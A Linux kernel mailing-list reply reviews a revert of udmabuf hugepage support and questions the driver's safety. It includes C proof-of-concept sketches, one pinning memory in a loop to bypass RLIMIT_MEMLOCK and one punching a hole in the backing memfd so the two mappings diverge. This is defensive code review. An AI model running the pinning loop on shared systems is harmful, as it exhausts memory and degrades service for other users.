Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'


From: David Hildenbrand
Subject: Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'
Date: Mon, 12 Jun 2023 09:46:22 +0200
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Thunderbird/102.12.0

On 12.06.23 09:10, Kasireddy, Vivek wrote:
> Hi Mike,

Hi Vivek,


> Sorry for the late reply; I just got back from vacation.
> If it is unsafe to directly use the subpages of a hugetlb page, then reverting
> this patch seems like the only option for addressing this issue immediately.
> So, this patch is
> Acked-by: Vivek Kasireddy <vivek.kasireddy@intel.com>
>
> As far as the use-case is concerned, there are two main users of the udmabuf
> driver: Qemu and CrosVM VMMs. However, it appears Qemu is the only one
> that uses hugetlb pages (when hugetlb=on is set) as the backing store for
> Guest (Linux, Android and Windows) system memory. The main goal is to
> share the pages associated with the Guest allocated framebuffer (FB) with
> the Host GPU driver and other components in a zero-copy way. To that end,
> the guest GPU driver (virtio-gpu) allocates 4k size pages (associated with
> the FB) and pins them before sharing the (guest) physical (or dma) addresses
> (and lengths) with Qemu. Qemu then translates the addresses into file
> offsets and shares these offsets with udmabuf.
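
In user-space terms that flow boils down to roughly the following (a minimal sketch, no error handling; the memfd here stands in for the memfd backing guest RAM, and the offset/size values are hypothetical stand-ins for the translated FB ranges):

/* Minimal sketch of the user-space side of UDMABUF_CREATE (hypothetical
 * values, no error handling). A real VMM passes the memfd that backs guest
 * RAM plus the file offsets it translated the guest FB addresses into. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/udmabuf.h>

int main(void)
{
    size_t size = 16 * 1024 * 1024;           /* stand-in for guest RAM */

    /* The memfd backing guest memory (QEMU: memory-backend-memfd). The
     * driver requires F_SEAL_SHRINK to be set and F_SEAL_WRITE to be clear. */
    int memfd = memfd_create("guest-ram", MFD_ALLOW_SEALING);
    ftruncate(memfd, size);
    fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);

    int devfd = open("/dev/udmabuf", O_RDWR);
    struct udmabuf_create create = {
        .memfd  = memfd,
        .flags  = UDMABUF_FLAGS_CLOEXEC,
        .offset = 4 * 1024 * 1024,            /* hypothetical FB file offset */
        .size   = 2 * 1024 * 1024,            /* hypothetical FB length */
    };

    /* Returns a dma-buf fd wrapping those shmem pages, which can then be
     * handed to the host GPU driver for zero-copy access. */
    int buffd = ioctl(devfd, UDMABUF_CREATE, &create);

    (void)buffd;
    return 0;
}

Since a guest framebuffer is usually scattered across guest physical memory, the list variant (UDMABUF_CREATE_LIST, one {offset, size} item per contiguous run) is what a VMM typically uses rather than a single range.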

Is my understanding correct that we can effectively long-term pin (worse than mlock) 64 MiB per UDMABUF_CREATE, eventually allowing !root users

ll /dev/udmabuf
crw-rw---- 1 root kvm 10, 125 12. Jun 08:12 /dev/udmabuf

to bypass their effective MEMLOCK limit, fragmenting physical memory and breaking swap?
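
To make that concrete, here is a minimal, hypothetical sketch of what such a user could do, assuming the default 64 MiB per-create limit that the figure above refers to; nothing in it is charged against RLIMIT_MEMLOCK, so the loop is bounded only by the fd limit:

/* Hypothetical sketch: effectively pin 64 MiB per UDMABUF_CREATE, over and
 * over. None of it is accounted against the caller's RLIMIT_MEMLOCK; the
 * pages stay referenced for as long as the dma-buf fds are kept open. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/udmabuf.h>

int main(void)
{
    const size_t chunk = 64 * 1024 * 1024;    /* default per-create limit */
    int devfd = open("/dev/udmabuf", O_RDWR);

    for (int i = 0; i < 512; i++) {           /* ~32 GiB if it all succeeds */
        int memfd = memfd_create("pin", MFD_ALLOW_SEALING);
        ftruncate(memfd, chunk);
        fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);

        struct udmabuf_create create = {
            .memfd = memfd, .flags = 0, .offset = 0, .size = chunk,
        };
        /* Keep the returned dma-buf fd open; leak it on purpose. */
        if (ioctl(devfd, UDMABUF_CREATE, &create) < 0)
            break;
        close(memfd);                         /* pages stay referenced anyway */
    }
    pause();                                  /* hold the memory hostage */
    return 0;
}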


Regarding the udmabuf_vm_fault(), I assume we're mapping pages we obtained from the memfd ourselves into a special VMA (mmap() of the udmabuf). I'm not sure how well shmem pages are prepared for getting mapped by someone else into an arbitrary VMA (page->index?).
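
For reference, the fault handler at this point looks roughly like the following (paraphrased from memory, not a verbatim quote):

/* Rough paraphrase of drivers/dma-buf/udmabuf.c:udmabuf_vm_fault(): the page
 * array filled at create time is handed straight to the faulting VMA. */
static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
{
	struct vm_area_struct *vma = vmf->vma;
	struct udmabuf *ubuf = vma->vm_private_data;
	pgoff_t pgoff = vmf->pgoff;

	if (pgoff >= ubuf->pagecount)
		return VM_FAULT_SIGBUS;

	/* A shmem page (or hugetlb subpage, with the reverted patch) grabbed
	 * at create time, mapped here into a VMA shmem knows nothing about. */
	vmf->page = ubuf->pages[pgoff];
	get_page(vmf->page);
	return 0;
}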

... also, just imagine someone doing FALLOC_FL_PUNCH_HOLE / ftruncate() on the memfd. What's mapped into the memfd no longer corresponds to what's pinned / mapped into the VMA.
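
To spell that scenario out, a minimal, hypothetical sketch (no error handling, assuming access to /dev/udmabuf and the driver behaviour at the time):

/* The memfd only carries F_SEAL_SHRINK, as udmabuf requires, so a hole can
 * still be punched after the dma-buf was created. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/udmabuf.h>

int main(void)
{
    size_t size = 2 * 1024 * 1024;

    int memfd = memfd_create("fb", MFD_ALLOW_SEALING);
    ftruncate(memfd, size);
    fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);

    /* Populate the shmem pages with a known pattern. */
    unsigned char *shm = mmap(NULL, size, PROT_READ | PROT_WRITE,
                              MAP_SHARED, memfd, 0);
    memset(shm, 0xaa, size);

    int devfd = open("/dev/udmabuf", O_RDWR);
    struct udmabuf_create create = {
        .memfd = memfd, .flags = 0, .offset = 0, .size = size,
    };
    int buffd = ioctl(devfd, UDMABUF_CREATE, &create);
    unsigned char *buf = mmap(NULL, size, PROT_READ, MAP_SHARED, buffd, 0);

    /* Drop the pages from the file: permitted despite F_SEAL_SHRINK. */
    fallocate(memfd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, size);

    /* The memfd view now faults in fresh zero pages, while the udmabuf still
     * maps the old, now orphaned pages: the two no longer correspond. */
    printf("memfd: %02x, udmabuf: %02x\n", shm[0], buf[0]);   /* 00 vs aa */
    return 0;
}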


Was linux-mm (and especially shmem maintainers, ccing Hugh) involved in the upstreaming of udmabuf?

--
Cheers,

David / dhildenb



